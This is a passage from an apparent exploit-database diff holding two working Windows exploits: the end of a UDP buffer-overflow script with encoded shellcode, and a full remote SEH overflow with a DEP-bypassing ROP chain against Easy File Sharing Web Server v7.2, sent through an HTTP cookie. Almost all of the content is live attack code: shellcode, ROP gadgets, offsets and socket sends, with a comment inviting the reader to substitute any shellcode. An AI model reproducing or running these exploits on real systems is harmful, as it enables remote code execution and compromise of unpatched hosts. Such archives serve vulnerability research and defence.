# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()

199
platforms/windows/remote/38829.py Executable file
View file

@ -0,0 +1,199 @@
#!/usr/bin/env python
#
# Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
# Date: 29/11/2015
# Exploit Author: Knaps
# Contact: @TheKnapsy
# Website: http://blog.knapsy.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 7 x64, but should work on any other Windows platform
#
# Notes:
# - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
# - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
# - bad chars: '\x00' and '\x3b'
# - max shellcode size allowed: 1260 bytes
#
import sys, socket, struct
# ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
# Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
def create_rop_chain():
rop_gadgets = [
# Generate value of 201 in EAX
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFF, # Value of '-201'
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
# Put EAX into EBX (other unneccessary stuff comes with this gadget as well...)
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
# Carry on with the ROP as generated by mona.py
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
# Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
# used solely by the remaining part of the above gadget (it doesn't really do anything for us)
0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll]
0x61c73281, # &Writable location [sqlite3.dll]
# And carry on further as generated by mona.py
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x10013ad6, # POP EBP # RETN [ImageLoad.dll]
0x61c227fa, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
# Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001b4f6, # POP ECX # RETN [ImageLoad.dll]
0x61c73281, # &Writable location [sqlite3.dll]
0x100194b3, # POP EDI # RETN [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# Check command line args
if len(sys.argv) <= 1:
print "Usage: python poc.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
# Offsets
rop_offset = 2455
max_size = 5000
seh_offset = 4059
eax_offset = 4183
# move ESP out of the way so the shellcode doesn't corrupt itself during execution
# metasm > add esp,-1500
shellcode = "\x81\xc4\x24\xfa\xff\xff"
# Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
# (maximum size of shellcode allowed: 1260 bytes)
#
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
# Payload size: 220 bytes
shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"
buffer = "A" * rop_offset # padding
buffer += create_rop_chain()
buffer += shellcode
buffer += "A" * (seh_offset - len(buffer)) # padding
buffer += "BBBB" # overwrite nSEH pointer
buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
buffer += "A" * (eax_offset - len(buffer)) # padding
buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception
buffer += "A" * (max_size - len(buffer)) # padding
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# Send payload to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()